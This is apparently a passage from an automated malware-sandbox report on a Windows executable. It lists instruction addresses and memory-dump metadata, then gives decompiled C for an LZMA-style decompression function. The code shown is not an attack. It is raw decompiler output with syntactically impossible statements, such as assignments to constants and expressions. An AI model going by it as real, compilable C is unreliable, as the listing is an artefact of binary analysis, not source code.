                                                                0x0040628c
                                                                0x0040628c
                                                                0x0040628f
                                                                0x00406292
                                                                0x00406292
                                                                0x00406295
                                                                0x00406298
                                                                0x00000000
                                                                0x00000000
                                                                0x0040629e
                                                                0x004062a4
                                                                0x00000000
                                                                0x00000000
                                                                0x004062aa
                                                                0x004062aa
                                                                0x004062ae
                                                                0x004062b1
                                                                0x004062b4
                                                                0x004062b7
                                                                0x004062ba
                                                                0x004062bb
                                                                0x004062be
                                                                0x004062c0
                                                                0x004062c6
                                                                0x004062c9
                                                                0x004062cc
                                                                0x004062cf
                                                                0x004062d2
                                                                0x004062d5
                                                                0x004062d8
                                                                0x004062f4
                                                                0x004062f7
                                                                0x004062fa
                                                                0x004062fd
                                                                0x00406304
                                                                0x00406308
                                                                0x0040630a
                                                                0x0040630e
                                                                0x004062da
                                                                0x004062da
                                                                0x004062de
                                                                0x004062e6
                                                                0x004062eb
                                                                0x004062ed
                                                                0x004062ef
                                                                0x004062ef
                                                                0x00406311
                                                                0x00406318
                                                                0x0040631b
                                                                0x00000000
                                                                0x00406321
                                                                0x00000000
                                                                0x00406321
                                                                0x00000000
                                                                0x00406326
                                                                0x00406326
                                                                0x0040632a
                                                                0x004069ea
                                                                0x00000000
                                                                0x004069ea
                                                                0x00406330
                                                                0x00406333
                                                                0x00406336
                                                                0x0040633a
                                                                0x0040633d
                                                                0x00406343
                                                                0x00406345
                                                                0x00406345
                                                                0x00406345
                                                                0x00406348
                                                                0x0040634b
                                                                0x0040634b
                                                                0x0040634b
                                                                0x00406351
                                                                0x00000000
                                                                0x00000000
                                                                0x00406353
                                                                0x00406356
                                                                0x00406359
                                                                0x0040635c
                                                                0x0040635f
                                                                0x00406362
                                                                0x00406365
                                                                0x00406368
                                                                0x0040636b
                                                                0x0040636e
                                                                0x00406371
                                                                0x00406389
                                                                0x0040638c
                                                                0x0040638f
                                                                0x00406392
                                                                0x00406392
                                                                0x00406395
                                                                0x00406399
                                                                0x0040639b
                                                                0x00406373
                                                                0x00406373
                                                                0x0040637b
                                                                0x00406380
                                                                0x00406382
                                                                0x00406384
                                                                0x00406384
                                                                0x0040639e
                                                                0x004063a5
                                                                0x004063a8
                                                                0x00000000
                                                                0x004063aa
                                                                0x00000000
                                                                0x004063aa
                                                                0x004063a8
                                                                0x004063af
                                                                0x004063af
                                                                0x004063af
                                                                0x004063af
                                                                0x00000000
                                                                0x00000000
                                                                0x004063ea
                                                                0x004063ea
                                                                0x004063ee
                                                                0x004069f6
                                                                0x00000000
                                                                0x004069f6
                                                                0x004063f4
                                                                0x004063f7
                                                                0x004063fa
                                                                0x004063fe
                                                                0x00406401
                                                                0x00406407
                                                                0x00406409
                                                                0x00406409
                                                                0x00406409
                                                                0x0040640c
                                                                0x0040640f
                                                                0x0040640f
                                                                0x00406415
                                                                0x004063b3
                                                                0x004063b3
                                                                0x004063b6
                                                                0x00000000
                                                                0x004063b6
                                                                0x00406417
                                                                0x00406417
                                                                0x0040641a
                                                                0x0040641d
                                                                0x00406420
                                                                0x00406423
                                                                0x00406426
                                                                0x00406429
                                                                0x0040642c
                                                                0x0040642f
                                                                0x00406432
                                                                0x00406435
                                                                0x0040644d
                                                                0x00406450
                                                                0x00406453
                                                                0x00406456
                                                                0x00406456
                                                                0x00406459
                                                                0x0040645d
                                                                0x0040645f
                                                                0x00406437
                                                                0x00406437
                                                                0x0040643f
                                                                0x00406444
                                                                0x00406446
                                                                0x00406448
                                                                0x00406448
                                                                0x00406462
                                                                0x00406469
                                                                0x0040646c
                                                                0x00000000
                                                                0x0040646e
                                                                0x00000000
                                                                0x0040646e
                                                                0x00000000
                                                                0x004066fb
                                                                0x004066fb
                                                                0x004066ff
                                                                0x00406a26
                                                                0x00000000
                                                                0x00406a26
                                                                0x00406705
                                                                0x00406708
                                                                0x0040670b
                                                                0x0040670f
                                                                0x00406712
                                                                0x00406718
                                                                0x0040671a
                                                                0x0040671a
                                                                0x0040671a
                                                                0x0040671d
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0040680a
                                                                0x0040680e
                                                                0x00406830
                                                                0x00406833
                                                                0x0040683d
                                                                0x00000000
                                                                0x0040683d
                                                                0x00406810
                                                                0x00406813
                                                                0x00406817
                                                                0x0040681a
                                                                0x0040681a
                                                                0x0040681d
                                                                0x00000000
                                                                0x00000000
                                                                0x004068c7
                                                                0x004068cb
                                                                0x004068e9
                                                                0x004068e9
                                                                0x004068e9
                                                                0x004068f0
                                                                0x004068f7
                                                                0x004068fe
                                                                0x004068fe
                                                                0x00000000
                                                                0x004068fe
                                                                0x004068cd
                                                                0x004068d0
                                                                0x004068d3
                                                                0x004068d6
                                                                0x004068dd
                                                                0x00406821
                                                                0x00406821
                                                                0x00406824
                                                                0x00000000
                                                                0x00000000
                                                                0x004069b8
                                                                0x004069bb
                                                                0x00000000
                                                                0x00000000
                                                                0x004065f2
                                                                0x004065f4
                                                                0x004065fb
                                                                0x004065fc
                                                                0x004065fe
                                                                0x00406601
                                                                0x00000000
                                                                0x00000000
                                                                0x00406609
                                                                0x0040660c
                                                                0x0040660f
                                                                0x00406611
                                                                0x00406613
                                                                0x00406613
                                                                0x00406614
                                                                0x00406617
                                                                0x0040661e
                                                                0x00406621
                                                                0x0040662f
                                                                0x00000000
                                                                0x00000000
                                                                0x00406905
                                                                0x00406905
                                                                0x00406908
                                                                0x0040690f
                                                                0x00000000
                                                                0x00000000
                                                                0x00406914
                                                                0x00406914
                                                                0x00406918
                                                                0x00406a50
                                                                0x00000000
                                                                0x00406a50
                                                                0x0040691e
                                                                0x00406921
                                                                0x00406924
                                                                0x00406928
                                                                0x0040692b
                                                                0x00406931
                                                                0x00406933
                                                                0x00406933
                                                                0x00406933
                                                                0x00406936
                                                                0x00406939
                                                                0x00406939
                                                                0x00406939
                                                                0x00406939
                                                                0x0040693c
                                                                0x0040693c
                                                                0x00406940
                                                                0x004069a0
                                                                0x004069a3
                                                                0x004069a8
                                                                0x004069a9
                                                                0x004069ab
                                                                0x004069ad
                                                                0x004069b0
                                                                0x00000000
                                                                0x004069b0
                                                                0x00406942
                                                                0x00406948
                                                                0x0040694b
                                                                0x0040694e
                                                                0x00406951
                                                                0x00406954
                                                                0x00406957
                                                                0x0040695a
                                                                0x0040695d
                                                                0x00406960
                                                                0x00406963
                                                                0x0040697c
                                                                0x0040697f
                                                                0x00406982
                                                                0x00406985
                                                                0x00406989
                                                                0x0040698b
                                                                0x0040698b
                                                                0x0040698c
                                                                0x0040698f
                                                                0x00406965
                                                                0x00406965
                                                                0x0040696d
                                                                0x00406972
                                                                0x00406974
                                                                0x00406977
                                                                0x00406977
                                                                0x00406992
                                                                0x00406999
                                                                0x00000000
                                                                0x0040699b
                                                                0x00000000
                                                                0x0040699b
                                                                0x00000000
                                                                0x00406637
                                                                0x0040663a
                                                                0x00406670
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a3
                                                                0x004067a3
                                                                0x004067a6
                                                                0x004067a8
                                                                0x00406a32
                                                                0x00000000
                                                                0x00406a32
                                                                0x004067ae
                                                                0x004067b1
                                                                0x00000000
                                                                0x00000000
                                                                0x004067b7
                                                                0x004067bb
                                                                0x004067be
                                                                0x004067be
                                                                0x004067be
                                                                0x00000000
                                                                0x004067be
                                                                0x0040663c
                                                                0x0040663e
                                                                0x00406640
                                                                0x00406642
                                                                0x00406645
                                                                0x00406646
                                                                0x00406648
                                                                0x0040664a
                                                                0x0040664d
                                                                0x00406650
                                                                0x00406666
                                                                0x0040666b
                                                                0x004066a3
                                                                0x004066a3
                                                                0x004066a7
                                                                0x004066d3
                                                                0x004066d5
                                                                0x004066dc
                                                                0x004066df
                                                                0x004066e2
                                                                0x004066e2
                                                                0x004066e7
                                                                0x004066e7
                                                                0x004066e9
                                                                0x004066ec
                                                                0x004066f3
                                                                0x004066f6
                                                                0x00406723
                                                                0x00406723
                                                                0x00406726
                                                                0x00406729
                                                                0x0040679d
                                                                0x0040679d
                                                                0x0040679d
                                                                0x00000000
                                                                0x0040679d
                                                                0x0040672b
                                                                0x00406731
                                                                0x00406734
                                                                0x00406737
                                                                0x0040673a
                                                                0x0040673d
                                                                0x00406740
                                                                0x00406743
                                                                0x00406746
                                                                0x00406749
                                                                0x0040674c
                                                                0x00406765
                                                                0x00406767
                                                                0x0040676a
                                                                0x0040676b
                                                                0x0040676e
                                                                0x00406770
                                                                0x00406773
                                                                0x00406775
                                                                0x00406777
                                                                0x0040677a
                                                                0x0040677c
                                                                0x0040677f
                                                                0x00406783
                                                                0x00406785
                                                                0x00406785
                                                                0x00406786
                                                                0x00406789
                                                                0x0040678c
                                                                0x0040674e
                                                                0x0040674e
                                                                0x00406756
                                                                0x0040675b
                                                                0x0040675d
                                                                0x00406760
                                                                0x00406760
                                                                0x0040678f
                                                                0x00406796
                                                                0x00406720
                                                                0x00406720
                                                                0x00406720
                                                                0x00406720
                                                                0x00000000
                                                                0x00406798
                                                                0x00000000
                                                                0x00406798
                                                                0x00406796
                                                                0x004066a9
                                                                0x004066ac
                                                                0x004066ae
                                                                0x004066b1
                                                                0x004066b4
                                                                0x004066b7
                                                                0x004066b9
                                                                0x004066bc
                                                                0x004066bf
                                                                0x004066bf
                                                                0x004066c2
                                                                0x004066c2
                                                                0x004066c5
                                                                0x004066cc
                                                                0x004066a0
                                                                0x004066a0
                                                                0x004066a0
                                                                0x004066a0
                                                                0x00000000
                                                                0x004066ce
                                                                0x00000000
                                                                0x004066ce
                                                                0x004066cc
                                                                0x00406652
                                                                0x00406655
                                                                0x00406657
                                                                0x0040665a
                                                                0x00000000
                                                                0x00000000
                                                                0x004063b9
                                                                0x004063b9
                                                                0x004063bd
                                                                0x00406a02
                                                                0x00000000
                                                                0x00406a02
                                                                0x004063c3
                                                                0x004063c6
                                                                0x004063c9
                                                                0x004063cc
                                                                0x004063cf
                                                                0x004063d2
                                                                0x004063d5
                                                                0x004063d7
                                                                0x004063da
                                                                0x004063dd
                                                                0x004063e0
                                                                0x004063e2
                                                                0x004063e2
                                                                0x004063e2
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004067c1
                                                                0x004067c1
                                                                0x004067c1
                                                                0x004067c5
                                                                0x00000000
                                                                0x00000000
                                                                0x004067cb
                                                                0x004067ce
                                                                0x004067d1
                                                                0x004067d4
                                                                0x004067d6
                                                                0x004067d6
                                                                0x004067d6
                                                                0x004067d9
                                                                0x004067dc
                                                                0x004067df
                                                                0x004067e2
                                                                0x004067e5
                                                                0x004067e8
                                                                0x004067e9
                                                                0x004067eb
                                                                0x004067eb
                                                                0x004067eb
                                                                0x004067ee
                                                                0x004067f1
                                                                0x004067f4
                                                                0x004067f7
                                                                0x004067fa
                                                                0x004067fe
                                                                0x00406800
                                                                0x00406803
                                                                0x00000000
                                                                0x00406805
                                                                0x00000000
                                                                0x00406805
                                                                0x00406803
                                                                0x00406a38
                                                                0x00000000
                                                                0x00000000
                                                                0x00406067

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                                                • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                                                                • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                                                • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00406025, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 98%
                                                                			E00406025(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406A77))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
